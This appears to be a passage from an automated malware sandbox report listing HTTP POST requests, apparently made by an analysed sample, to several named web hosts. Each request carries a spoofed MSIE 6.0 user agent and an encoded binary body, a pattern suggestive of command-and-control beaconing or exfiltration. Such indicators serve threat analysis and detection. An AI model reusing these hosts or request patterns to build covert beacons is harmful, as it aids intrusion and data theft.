                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 68 78 56 66 36 42 47 37 6a 35 68 71 49 56 4b 76 73 44 6e 74 68 47 72 42 4a 42 6a 50 36 5a 77 78 31 54 6f 33 79 72 57 4f 7a 48 35 56 52 31 51 30 70 5a 79 6d 6b 57 58 38 39 35 4d 51 49 68 70 4d 65 58 30 64 63 62 7a 59 71 68 4a 62 54 4d 2f 7a 75 4e 59 79 59 35 5a 78 45 44 64 36 5a 41 61 65 69 65 52 43 56 73 71 71 32 6a 32 39 66 52 5a 59 37 44 64 55 30 2f 78 78 5a 56 51 54 38 66 43 47 4f 42 2f 4c 62 4f 6f 5a 2f 78 36 37 2f 4d 7a 73 6e 32 30 4e 31 6c 54 6e 42 6b 41 64 4e 50 7a 6b 30 32 2b 33 53 33 56 39 4e 6a 7a 78 6c 66 2f 4f 46 4e 32 62 6d 69 44 6c 78 58 6e 77 73 36 37 41 75 38 34 38 75 6d 30 51 33 30 33 43 2f 4f 37 37 66 48 51 74 4d 6d 34 2b 37 47 47 77 56 76 46 6b 4e 51 6e 36 59 64 71 4c 79 44 7a 4d 52 4d 62 6d 4a 70 76 6b 62 39 64 41 65 6a 75 33 76 31 41 6a 61 49 62 67 54 6b 75 6c 47 70 72 56 4d 72 64 45 79 6e 53 74 34 34 74 67 4c 38 2b 75 2b 72 56 2f 51 65 69 79 2b 44 4c 62 63 71 6b 68 73 69 73 74 30 4c 4b 74 6a 43 51 37 30 71 67 73 63 61 68 47 71 73 36 7a 47 55 6e 2b 6a 50 75 58 70 61 4c 50 61 32 47 48 76 79 59 44 54 4c 73 73 4a 41 31 65 58 4a 41 6b 4a 4e 69 45 38 36 4c 50 4b 4a 50 72 74 70 53 35 45 6e 76 78 62 39 32 73 42 4d 53 69 41 6d 70 70 57 59 69 36 69 72 77 2b 6d 78 57 59 70 4d 58 57 34 33 56 51 44 43 46 49 59 45 6a 6e 6b 74 54 6e 67 4a 4d 48 65 30 6d 6d 69 49 45 57 43 33 46 53 6e 59 69 34 62 30 6b 34 34 55 62 4b 6b 4b 2b 38 30 35 76 74 4e 33 4a 50 6d 36 63 34 68 4c 77 39 48 48 63 52 52 7a 6e 37 38 41 35 2b 72 45 64 7a 59 56 6b 43 71 4d 43 41 51 68 4a 79 66 65 34 6c 68 33 63 2f 41 48 68 6d 55 76 65 70 78 39 73 66 63 56 70 69 56 53 36 41 33 6c 31 47 49 55 69 50 52 67 6d 2b 6e 49 35 7a 33 35 4c 68 31 67 6c 44 4e 45 4e 47 6c 54 45 3d Data Ascii: hxVf6BG7j5hqIVKvsDnthGrBJBjP6Zwx1To3yrWOzH5VR1Q0pZymkWX895MQIhpMeX0dcbzYqhJbTM/zuNYyY5ZxEDd6ZAaeieRCVsqq2j29fRZY7DdU0/xxZVQT8fCGOB/LbOoZ/x67/Mzsn20N1lTnBkAdNPzk02+3S3V9Njzxlf/OFN2bmiDlxXnws67Au848um0Q303C/O77fHQtMm4+7GGwVvFkNQn6YdqLyDzMRMbmJpvkb9dAeju3v1AjaIbgTkulGprVMrdEynSt44tgL8+u+rV/Qeiy+DLbcqkhsist0LKtjCQ70qgscahGqs6zGUn+jPuXpaLPa2GHvyYDTLssJA1eXJAkJNiE86LPKJPrtpS5Envxb92sBMSiAmppWYi6irw+mxWYpMXW43VQDCFIYEjnktTngJMHe0mmiIEWC3FSnYi4b0k44UbKkK+805vtN3JPm6c4hLw9HHcRRzn78A5+rEdzYVkCqMCAQhJyfe4lh3c/AHhmUvepx9sfcVpiVS6A3l1GIUiPRgm+nI5z35Lh1glDNENGlTE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 74 75 69 39 49 54 66 6f 6d 5a 69 55 64 4f 6d 7a 70 71 67 6b 2f 49 41 37 5a 68 48 74 4c 43 4a 33 57 39 2b 75 71 78 75 73 6e 75 56 34 44 66 53 48 64 7a 31 72 38 30 53 56 47 2b 58 64 4c 58 30 33 4c 49 39 62 70 62 78 49 6f 61 5a 56 66 2f 6e 47 6a 4d 58 63 38 4b 2b 59 33 4b 63 31 78 65 32 63 57 7a 47 52 32 62 4d 79 72 53 4e 75 55 4c 67 43 50 79 68 71 53 73 4e 62 7a 46 69 59 4b 78 4a 4f 64 45 35 7a 39 43 6d 48 39 62 56 53 38 6d 39 72 5a 52 42 73 63 58 31 4a 33 33 66 64 74 42 72 44 62 31 62 6f 76 33 41 61 6b 49 34 65 71 67 4f 72 4d 65 38 41 6c 70 4c 56 4a 6a 64 32 79 39 2f 49 7a 6d 49 66 7a 75 59 78 74 41 50 44 54 77 4e 62 38 36 6c 7a 69 77 4f 2b 37 74 43 44 75 4b 79 7a 38 63 62 46 70 57 72 6d 59 6d 78 30 39 4a 50 75 57 6f 45 32 6e 61 59 67 52 54 75 4a 44 38 78 76 61 77 6c 2b 71 78 6f 6f 6e 6e 61 74 48 78 39 76 6c 37 41 65 48 57 6e 50 33 64 41 43 73 6f 53 69 30 65 4f 4f 37 48 77 77 70 54 65 2f 58 55 63 4d 30 4e 48 36 4e 6e 69 66 6b 58 31 58 6c 5a 4f 42 30 44 2f 57 34 2b 50 76 64 6f 46 42 67 73 4e 79 52 35 6e 6f 4e 37 38 67 79 4a 52 4f 58 64 33 69 70 47 39 6b 35 4f 46 2f 70 58 53 42 53 6e 75 6c 4e 76 4b 2b 55 7a 59 5a 32 6a 55 39 4f 66 4d 69 70 42 64 32 30 56 31 34 4f 66 41 6d 66 2b 37 4f 38 69 4b 6d 57 4c 37 79 6d 65 5a 4a 46 68 68 50 75 4a 78 37 77 67 78 73 73 4d 63 58 66 50 75 79 67 38 30 38 52 39 52 38 39 65 43 76 33 30 6a 74 35 63 6b 53 70 77 38 7a 6e 31 64 2b 2f 6b 4a 63 48 6b 6e 61 50 61 38 44 70 2b 55 63 6e 75 34 4d 7a 74 76 46 73 4e 55 7a 69 41 71 61 55 31 62 4a 52 7a 43 57 44 51 70 31 65 57 2f 4a 63 67 63 69 71 77 53 44 53 6f 32 47 63 62 54 73 68 31 45 53 42 58 49 3d Data Ascii: tui9ITfomZiUdOmzpqgk/IA7ZhHtLCJ3W9+uqxusnuV4DfSHdz1r80SVG+XdLX03LI9bpbxIoaZVf/nGjMXc8K+Y3Kc1xe2cWzGR2bMyrSNuULgCPyhqSsNbzFiYKxJOdE5z9CmH9bVS8m9rZRBscX1J33fdtBrDb1bov3AakI4eqgOrMe8AlpLVJjd2y9/IzmIfzuYxtAPDTwNb86lziwO+7tCDuKyz8cbFpWrmYmx09JPuWoE2naYgRTuJD8xvawl+qxoonnatHx9vl7AeHWnP3dACsoSi0eOO7HwwpTe/XUcM0NH6NnifkX1XlZOB0D/W4+PvdoFBgsNyR5noN78gyJROXd3ipG9k5OF/pXSBSnulNvK+UzYZ2jU9OfMipBd20V14OfAmf+7O8iKmWL7ymeZJFhhPuJx7wgxssMcXfPuyg808R9R89eCv30jt5ckSpw8zn1d+/kJcHknaPa8Dp+Ucnu4MztvFsNUziAqaU1bJRzCWDQp1eW/JcgciqwSDSo2GcbTsh1ESBXI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 50 56 62 64 49 4f 33 67 6d 5a 69 65 31 6b 64 51 35 4d 30 43 51 36 62 54 6b 74 44 62 53 72 76 4d 63 54 41 63 6d 63 69 4f 6a 7a 59 6a 2b 59 57 38 6a 6a 71 62 6d 74 2f 4e 42 6d 53 49 6d 6f 4c 71 4e 79 57 70 74 4e 41 77 6f 73 5a 65 50 38 62 61 72 57 49 2b 34 63 4d 2b 59 5a 30 46 77 30 7a 62 49 62 61 77 51 41 2b 37 59 43 4c 4a 70 4b 6d 78 51 49 70 48 68 44 76 65 6a 66 4f 31 77 74 66 79 6d 45 70 55 6b 45 57 56 58 6a 6e 78 59 58 5a 2f 43 47 55 6f 61 44 36 41 6e 47 34 4e 2b 42 34 46 70 62 57 79 4f 47 4b 52 39 65 77 2f 4f 4c 42 72 5a 2b 64 34 72 6b 64 37 44 66 51 49 68 47 74 50 61 46 52 57 61 6e 32 71 6d 6c 35 58 65 4e 2f 78 77 69 6d 4c 6d 55 54 65 2f 2b 34 44 2f 6b 57 6d 6d 65 50 37 30 4d 6e 73 57 39 55 56 66 4b 4e 56 5a 42 43 41 68 79 35 77 58 57 59 36 35 78 57 4d 54 36 42 36 65 42 5a 47 4d 54 5a 35 72 34 57 66 52 77 79 2b 58 65 73 77 77 68 67 71 4a 46 72 52 6f 52 35 44 6a 7a 6e 50 68 57 49 65 4c 30 61 55 68 32 42 5a 7a 38 6c 69 65 48 69 4c 41 67 47 55 6e 30 6d 35 4c 37 41 62 53 4b 35 50 2f 62 33 6b 34 72 6b 48 37 6d 68 79 2b 2f 6b 74 47 7a 41 70 78 50 71 45 47 70 38 39 4e 69 66 6f 67 4f 70 52 46 54 66 4c 43 61 79 32 64 44 71 63 49 67 63 4d 64 58 39 6d 7a 46 46 5a 41 6d 69 39 68 45 50 34 72 72 50 6b 41 4c 31 6c 57 61 4d 76 47 52 4e 35 70 52 44 67 78 6f 34 65 56 64 2f 4e 43 6a 61 4e 53 65 4c 42 5a 73 36 79 74 49 55 54 66 48 2b 70 67 77 33 4b 39 6a 32 45 52 61 63 62 43 47 4a 2f 70 32 4d 57 77 76 65 53 62 44 38 75 30 59 6e 6c 5a 74 41 75 6e 55 74 64 56 4e 39 68 39 6d 4e 43 73 4e 31 67 30 69 67 74 65 44 4f 6c 51 57 6a 41 49 6c 4d 38 39 75 51 50 49 44 66 46 51 58 42 39 65 67 4a 5a Data Ascii: PVbdIO3gmZie1kdQ5M0CQ6bTktDbSrvMcTAcmciOjzYj+YW8jjqbmt/NBmSImoLqNyWptNAwosZeP8barWI+4cM+YZ0Fw0zbIbawQA+7YCLJpKmxQIpHhDvejfO1wtfymEpUkEWVXjnxYXZ/CGUoaD6AnG4N+B4FpbWyOGKR9ew/OLBrZ+d4rkd7DfQIhGtPaFRWan2qml5XeN/xwimLmUTe/+4D/kWmmeP70MnsW9UVfKNVZBCAhy5wXWY65xWMT6B6eBZGMTZ5r4WfRwy+XeswwhgqJFrRoR5DjznPhWIeL0aUh2BZz8lieHiLAgGUn0m5L7AbSK5P/b3k4rkH7mhy+/ktGzApxPqEGp89NifogOpRFTfLCay2dDqcIgcMdX9mzFFZAmi9hEP4rrPkAL1lWaMvGRN5pRDgxo4eVd/NCjaNSeLBZs6ytIUTfH+pgw3K9j2ERacbCGJ/p2MWwveSbD8u0YnlZtAunUtdVN9h9mNCsN1g0igteDOlQWjAIlM89uQPIDfFQXB9egJZ
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 7a 6f 42 39 48 34 44 56 6d 5a 69 4c 31 41 6b 53 55 38 72 50 49 4c 4d 59 6d 49 46 6f 55 69 30 48 74 47 52 42 55 34 34 7a 71 34 62 59 4d 50 62 45 5a 70 52 31 57 54 53 45 33 4c 45 35 44 6e 31 44 44 6e 6f 6d 4d 34 4b 6f 76 67 56 4f 4e 55 45 66 54 50 56 55 75 76 79 32 74 31 4f 76 4f 37 64 70 42 70 56 4c 36 34 44 6b 7a 70 32 46 4a 54 4b 78 71 49 47 71 59 76 2b 66 79 47 68 35 42 70 31 65 6b 45 49 64 4b 47 68 52 61 38 4e 74 6d 62 6a 31 6f 63 36 63 39 4f 51 6c 6a 6f 5a 76 79 45 42 31 6d 57 76 73 4d 5a 6a 46 4a 56 51 70 68 4b 73 57 67 68 4d 6d 75 33 6a 38 6e 63 66 69 63 4d 53 4a 65 30 53 4e 43 61 45 4f 45 61 45 79 6c 79 76 39 51 77 61 63 44 46 55 67 2f 2b 62 65 75 72 57 6b 62 66 34 53 36 73 38 54 4d 58 78 7a 39 2f 72 44 78 7a 2b 42 61 6e 44 4f 69 6f 2b 6d 7a 56 46 4d 69 52 2f 70 39 32 67 6a 42 31 2f 31 73 33 6c 6a 61 77 67 62 78 6f 6f 7a 6a 39 6a 65 42 2f 4d 55 55 79 54 68 6b 6e 76 48 71 4a 77 42 7a 71 4e 48 6d 4a 7a 4e 62 44 63 32 6f 39 39 65 59 4d 4c 36 66 4f 74 33 50 63 6c 59 37 61 2f 4f 45 59 6b 44 50 41 31 5a 56 39 2f 43 48 64 69 49 78 59 6a 61 77 6c 4a 50 43 6b 77 49 45 34 34 2f 2f 75 6a 75 66 69 75 6d 51 44 77 65 77 71 39 7a 68 55 4c 75 34 73 4c 32 30 4d 6e 33 49 56 48 73 75 32 4c 51 64 56 2f 4f 6f 54 66 2f 2b 36 68 37 4f 72 4f 79 4e 77 73 6a 54 74 45 73 37 6f 4e 48 45 33 48 67 49 54 54 6f 73 56 51 30 51 64 47 4d 32 50 63 74 2f 54 36 46 74 2f 2f 2b 4c 77 76 61 77 6d 79 6c 4f 79 44 36 74 51 45 64 34 53 38 39 2b 4e 57 2b 51 46 33 58 35 34 72 4f 73 35 4e 4a 53 6f 49 57 55 61 76 62 47 6a 66 6d 71 6a 6b 57 38 78 51 78 47 6a 54 76 6c 2b 65 65 4c 78 64 67 49 70 30 49 72 42 36 57 43 77 73 57 4d 59 41 71 45 6f 31 4a 45 4f 52 2f 48 49 41 3d Data Ascii: zoB9H4DVmZiL1AkSU8rPILMYmIFoUi0HtGRBU44zq4bYMPbEZpR1WTSE3LE5Dn1DDnomM4KovgVONUEfTPVUuvy2t1OvO7dpBpVL64Dkzp2FJTKxqIGqYv+fyGh5Bp1ekEIdKGhRa8Ntmbj1oc6c9OQljoZvyEB1mWvsMZjFJVQphKsWghMmu3j8ncficMSJe0SNCaEOEaEylyv9QwacDFUg/+beurWkbf4S6s8TMXxz9/rDxz+BanDOio+mzVFMiR/p92gjB1/1s3ljawgbxoozj9jeB/MUUyThknvHqJwBzqNHmJzNbDc2o99eYML6fOt3PclY7a/OEYkDPA1ZV9/CHdiIxYjawlJPCkwIE44//ujufiumQDwewq9zhULu4sL20Mn3IVHsu2LQdV/OoTf/+6h7OrOyNwsjTtEs7oNHE3HgITTosVQ0QdGM2Pct/T6Ft//+LwvawmylOyD6tQEd4S89+NW+QF3X54rOs5NJSoIWUavbGjfmqjkW8xQxGjTvl+eeLxdgIp0IrB6WCwsWMYAqEo1JEOR/HIA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 70 6b 58 4e 49 67 6a 78 6d 5a 69 6d 44 54 50 54 53 32 41 52 33 48 73 6c 54 38 6d 51 2b 42 6a 61 76 4c 52 78 4e 77 5a 46 51 43 31 2f 42 37 52 6d 6d 34 6d 45 36 56 6a 2b 44 2b 35 2f 57 41 5a 32 59 48 6a 38 56 47 53 5a 35 75 44 6f 41 45 59 76 6a 72 49 79 46 39 33 55 43 39 4a 63 54 44 49 4c 37 4d 41 73 45 4a 52 67 2b 69 51 55 4b 78 53 33 2b 66 64 4d 39 31 75 58 5a 71 37 7a 77 72 76 43 4b 78 37 63 35 50 73 38 53 77 51 4a 51 7a 47 65 72 48 70 75 35 68 79 42 33 4e 77 61 47 6c 4e 6f 6b 58 76 68 6f 6d 69 55 6a 58 32 37 6f 42 79 69 47 36 64 48 66 39 4f 51 73 57 43 34 75 31 31 50 34 42 4a 49 61 7a 6a 78 4e 42 37 31 73 42 32 4f 72 53 45 74 54 46 30 56 4e 74 68 43 4d 38 35 38 46 4d 63 38 73 4d 66 6f 4a 41 2f 71 31 31 33 43 6c 78 76 6e 79 4b 65 2f 69 52 46 38 74 5a 6d 4f 72 78 78 36 49 39 79 65 6c 48 36 36 2b 74 43 44 74 49 63 65 52 55 57 45 68 57 43 72 6e 79 48 37 73 43 6b 6e 63 65 42 2b 53 35 7a 4c 78 54 4e 66 63 74 7a 67 34 50 6e 71 79 59 56 71 66 4e 71 44 61 75 46 77 6a 2b 63 54 57 6c 49 39 57 55 43 6e 63 62 32 35 66 30 72 47 6c 4f 4b 53 6d 68 4a 55 4c 46 37 33 4b 31 62 67 56 39 6f 30 42 32 47 34 77 31 45 37 36 4b 33 69 68 6d 49 36 74 4d 51 74 42 6b 66 6a 74 42 52 2f 57 69 62 68 56 51 35 35 42 72 78 73 4b 52 79 54 56 70 59 53 4f 54 51 51 4b 36 66 4c 73 7a 41 52 54 63 72 66 75 55 2f 34 5a 63 35 43 73 76 38 52 71 34 33 70 62 47 4a 62 65 6f 48 75 62 55 61 58 5a 37 58 53 68 66 59 4a 67 6a 51 62 45 44 4d 4b 78 6e 67 32 47 64 76 51 45 38 49 56 4e 5a 39 56 78 51 35 6e 45 62 58 65 72 43 33 75 69 65 4a 47 6b 4d 32 43 31 44 2f 55 2f 35 70 2f 6f 4f 4f 78 6b 78 69 77 30 7a 6e 64 37 30 56 74 67 58 6a 32 6d 72 6c 47 75 4f 32 69 31 6f 66 4f 7a 73 70 57 62 4a 61 79 79 48 46 6f 76 35 65 4f 68 62 79 36 44 6f 31 64 6d 36 38 4c 30 37 47 4e 57 67 3d 3d Data Ascii: pkXNIgjxmZimDTPTS2AR3HslT8mQ+BjavLRxNwZFQC1/B7Rmm4mE6Vj+D+5/WAZ2YHj8VGSZ5uDoAEYvjrIyF93UC9JcTDIL7MAsEJRg+iQUKxS3+fdM91uXZq7zwrvCKx7c5Ps8SwQJQzGerHpu5hyB3NwaGlNokXvhomiUjX27oByiG6dHf9OQsWC4u11P4BJIazjxNB71sB2OrSEtTF0VNthCM858FMc8sMfoJA/q113ClxvnyKe/iRF8tZmOrxx6I9yelH66+tCDtIceRUWEhWCrnyH7sCknceB+S5zLxTNfctzg4PnqyYVqfNqDauFwj+cTWlI9WUCncb25f0rGlOKSmhJULF73K1bgV9o0B2G4w1E76K3ihmI6tMQtBkfjtBR/WibhVQ55BrxsKRyTVpYSOTQQK6fLszARTcrfuU/4Zc5Csv8Rq43pbGJbeoHubUaXZ7XShfYJgjQbEDMKxng2GdvQE8IVNZ9VxQ5nEbXerC3uieJGkM2C1D/U/5p/oOOxkxiw0znd70VtgXj2mrlGuO2i1ofOzspWbJayyHFov5eOhby6Do1dm68L07GNWg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheData Raw: 6f 2b 53 6e 6a 53 49 5a 6c 5a 67 57 4f 45 74 75 6c 63 5a 57 32 4b 58 36 4e 53 53 79 67 30 48 63 64 70 6b 73 74 4b 64 64 68 69 71 70 62 4b 76 7a 38 51 71 33 34 4a 6b 52 53 70 50 7a 4c 6c 49 65 2b 7a 6e 57 52 65 43 46 38 59 2b 6c 6c 37 53 2f 64 57 4c 4a 59 62 57 43 64 4d 6e 4c 76 42 2b 74 50 68 38 32 49 56 4d 65 50 45 42 79 73 67 39 74 7a 72 48 79 32 47 38 6f 31 75 67 4d 5a 49 2f 31 6b 43 45 4b 63 38 44 44 4e 70 71 65 4d 7a 6d 55 38 70 33 61 43 51 32 30 30 57 70 78 4d 36 2b 48 4d 36 63 33 6c 49 4f 33 76 4d 34 49 62 50 4c 4b 48 76 69 6b 4d 65 6c 41 52 61 46 61 52 54 7a 52 58 67 53 5a 42 2f 58 72 2f 2f 68 4a 72 61 75 55 78 46 68 31 72 54 2f 6f 39 42 2b 69 46 46 78 6f 69 53 4e 7a 7a 42 35 72 6f 6f 31 47 64 39 75 35 70 58 2f 42 33 4c 2f 45 6c 5a 6c 69 4e 41 34 75 61 38 79 58 46 46 49 7a 4b 49 45 65 79 46 74 55 51 49 66 52 4a 43 7a 43 32 76 52 50 44 2b 7a 63 4d 30 69 5a 41 75 78 49 61 78 48 53 38 62 48 6c 6d 30 37 48 4f 50 57 6d 4a 66 6d 73 52 2b 34 62 65 2f 6a 48 6e 56 6f 36 51 65 79 2f 51 32 56 4d 4d 6a 53 33 4d 70 50 7a 5a 74 6f 72 46 4c 74 31 36 51 67 31 4b 38 57 36 58 32 31 44 52 7a 42 56 57 59 36 4b 62 7a 78 6b 55 38 56 46 78 5a 6f 51 59 77 53 72 49 51 45 74 66 61 31 63 76 5a 37 72 54 4f 54 79 50 50 36 38 76 6b 6d 79 6d 75 6a 56 2f 35 4f 2b 76 65 5a 6f 50 2f 58 51 36 2b 71 67 65 6b 42 48 6a 4b 47 68 72 33 37 55 4a 42 45 45 4f 6d 74 41 41 75 6d 7a 34 39 72 74 67 50 7a 50 4c 35 31 73 74 33 44 4f 7a 63 70 47 6c 4f 73 55 34 73 77 46 36 6e 44 4d 71 4c 6f 50 43 51 66 42 6f 67 53 4c 76 6a 58 47 39 67 73 77 5a 5a 4c 69 33 56 35 49 63 53 2b 47 55 71 4b 5a 6d 79 31 38 52 67 72 58 6d 53 32 67 31 72 32 77 33 58 56 62 49 33 41 3d Data Ascii: o+SnjSIZlZgWOEtulcZW2KX6NSSyg0HcdpkstKddhiqpbKvz8Qq34JkRSpPzLlIe+znWReCF8Y+ll7S/dWLJYbWCdMnLvB+tPh82IVMePEBysg9tzrHy2G8o1ugMZI/1kCEKc8DDNpqeMzmU8p3aCQ200WpxM6+HM6c3lIO3vM4IbPLKHvikMelARaFaRTzRXgSZB/Xr//hJrauUxFh1rT/o9B+iFFxoiSNzzB5roo1Gd9u5pX/B3L/ElZliNA4ua8yXFFIzKIEeyFtUQIfRJCzC2vRPD+zcM0iZAuxIaxHS8bHlm07HOPWmJfmsR+4be/jHnVo6Qey/Q2VMMjS3MpPzZtorFLt16Qg1K8W6X21DRzBVWY6KbzxkU8VFxZoQYwSrIQEtfa1cvZ7rTOTyPP68vkmymujV/5O+veZoP/XQ6+qgekBHjKGhr37UJBEEOmtAAumz49rtgPzPL51st3DOzcpGlOsU4swF6nDMqLoPCQfBogSLvjXG9gswZZLi3V5IcS+GUqKZmy18RgrXmS2g1r2w3XVbI3A=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 7a 6f 42 39 48 34 44 56 6d 5a 69 4c 31 41 6b 53 55 38 72 50 49 4c 4d 59 6d 49 46 6f 55 69 30 48 74 47 52 42 55 34 34 7a 71 34 62 59 4d 50 62 45 5a 70 52 31 57 54 53 45 33 4c 45 35 44 6e 31 44 44 6e 6f 6d 4d 34 4b 6f 76 67 56 4f 4e 55 45 66 54 50 56 55 75 76 79 32 74 31 4f 76 4f 37 64 70 42 70 56 4c 36 34 44 6b 7a 70 32 46 4a 54 4b 78 71 49 47 71 59 76 2b 66 79 47 68 35 42 70 31 65 6b 45 49 64 4b 47 68 52 61 38 4e 74 6d 62 6a 31 6f 63 36 63 39 4f 51 6c 6a 6f 5a 76 79 45 42 31 6d 57 76 73 4d 5a 6a 46 4a 56 51 70 68 4b 73 57 67 68 4d 6d 75 33 6a 38 6e 63 66 69 63 4d 53 4a 65 30 53 4e 43 61 45 4f 45 61 45 79 6c 79 76 39 51 77 61 63 44 46 55 67 2f 2b 62 65 75 72 57 6b 62 66 34 53 36 73 38 54 4d 58 78 7a 39 2f 72 44 78 7a 2b 42 61 6e 44 4f 69 6f 2b 6d 7a 56 46 4d 69 52 2f 70 39 32 67 6a 42 31 2f 31 73 33 6c 6a 61 77 67 62 78 6f 6f 7a 6a 39 6a 65 42 2f 4d 55 55 79 54 68 6b 6e 76 48 71 4a 77 42 7a 71 4e 48 6d 4a 7a 4e 62 44 63 32 6f 39 39 65 59 4d 4c 36 66 4f 74 33 50 63 6c 59 37 61 2f 4f 45 59 6b 44 50 41 31 5a 56 39 2f 43 48 64 69 49 78 59 6a 61 77 6c 4a 50 43 6b 77 49 45 34 34 2f 2f 75 6a 75 66 69 75 6d 51 44 77 65 77 71 39 7a 68 55 4c 75 34 73 4c 32 30 4d 6e 33 49 56 48 73 75 32 4c 51 64 56 2f 4f 6f 54 66 2f 2b 36 68 37 4f 72 4f 79 4e 77 73 6a 54 74 45 73 37 6f 4e 48 45 33 48 67 49 54 54 6f 73 56 51 30 51 64 47 4d 32 50 63 74 2f 54 36 46 74 2f 2f 2b 4c 77 76 61 77 6d 79 6c 4f 79 44 36 74 51 45 64 34 53 38 39 2b 4e 57 2b 51 46 33 58 35 34 72 4f 73 35 4e 4a 53 6f 49 57 55 61 76 62 47 6a 66 6d 71 6a 6b 57 38 78 51 78 47 6a 54 76 6c 2b 65 65 4c 78 64 67 49 70 30 49 72 42 36 57 43 77 73 57 4d 59 41 71 45 6f 31 4a 45 4f 52 2f 48 49 41 3d Data Ascii: zoB9H4DVmZiL1AkSU8rPILMYmIFoUi0HtGRBU44zq4bYMPbEZpR1WTSE3LE5Dn1DDnomM4KovgVONUEfTPVUuvy2t1OvO7dpBpVL64Dkzp2FJTKxqIGqYv+fyGh5Bp1ekEIdKGhRa8Ntmbj1oc6c9OQljoZvyEB1mWvsMZjFJVQphKsWghMmu3j8ncficMSJe0SNCaEOEaEylyv9QwacDFUg/+beurWkbf4S6s8TMXxz9/rDxz+BanDOio+mzVFMiR/p92gjB1/1s3ljawgbxoozj9jeB/MUUyThknvHqJwBzqNHmJzNbDc2o99eYML6fOt3PclY7a/OEYkDPA1ZV9/CHdiIxYjawlJPCkwIE44//ujufiumQDwewq9zhULu4sL20Mn3IVHsu2LQdV/OoTf/+6h7OrOyNwsjTtEs7oNHE3HgITTosVQ0QdGM2Pct/T6Ft//+LwvawmylOyD6tQEd4S89+NW+QF3X54rOs5NJSoIWUavbGjfmqjkW8xQxGjTvl+eeLxdgIp0IrB6WCwsWMYAqEo1JEOR/HIA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwk; _mcnc=1Data Raw: 68 68 58 45 46 62 56 44 65 4a 67 32 69 70 42 72 48 49 45 78 67 71 37 6c 6f 54 6c 44 47 51 35 4d 75 56 75 38 36 62 34 66 70 6b 4b 58 4c 77 6f 64 51 69 63 41 32 38 71 42 2f 45 2b 47 6f 68 64 35 55 73 2f 74 4b 48 30 58 6a 68 74 6e 41 75 38 36 47 5a 77 75 64 46 30 78 31 71 36 73 49 56 54 7a 76 7a 75 76 6e 6d 7a 65 2f 78 35 47 75 39 41 65 47 42 45 37 4b 34 6f 45 49 6e 54 50 37 59 6e 5a 55 2f 2b 42 46 72 50 35 31 6a 38 76 61 37 66 2f 6d 59 53 46 42 6b 4d 55 39 30 52 46 35 70 58 41 73 4d 4b 31 51 52 32 53 68 6f 64 68 6f 35 5a 66 4f 6c 4b 7a 65 54 75 62 5a 42 4d 32 6c 75 38 35 35 48 30 6f 54 6c 64 32 56 6b 41 66 49 77 33 69 65 6c 63 4b 42 72 50 47 5a 67 58 33 79 2f 74 71 32 73 6d 63 36 4b 6a 36 4f 55 6e 34 50 57 59 79 6f 72 2b 34 51 6b 38 36 6b 42 4c 30 59 46 56 51 73 4f 67 6f 6b 6e 70 52 39 6b 74 4a 74 4d 36 39 57 2b 65 71 74 69 6b 4c 42 57 41 7a 55 6f 4b 58 56 2b 44 34 50 66 45 71 5a 35 42 2f 69 7a 6c 62 65 36 76 6b 5a 32 44 73 79 31 73 53 36 42 35 50 2f 51 41 4f 2b 2f 78 4f 78 33 58 4e 72 4c 36 72 32 4e 45 37 33 35 55 41 4a 31 55 70 33 67 58 47 34 4d 72 79 38 56 50 38 4d 45 64 77 6a 76 6f 47 69 4b 6f 4a 71 35 74 39 65 7a 66 55 76 57 69 43 71 30 7a 58 65 4b 69 4d 57 51 6c 67 79 59 39 6d 33 4e 58 5a 5a 57 5a 46 63 68 50 6f 33 63 4f 49 5a 66 63 54 67 2b 50 79 35 78 51 74 4d 4e 47 63 72 36 6e 50 6b 70 6a 39 4d 30 63 76 62 4e 50 4e 62 6f 30 46 41 54 59 4c 43 57 67 76 64 34 52 5a 42 57 37 69 71 4c 63 4a 2f 61 37 53 67 46 58 57 52 56 2b 47 42 49 59 6f 34 55 35 56 56 30 6d 32 37 50 7a 71 66 4b 61 39 45 70 45 34 73 62 4f 70 73 63 6f 61 6a 30 75 6d 6e 61 7a 43 4f 38 35 52 71 6b 71 76 6d 32 35 76 30 57 72 36 52 73 31 77 6f 62 42 6b 6c 70 35 44 66 39 67 56 61 76 75 54 79 47 42 42 46 39 2f 52 4c 41 3d 3d Data Ascii: 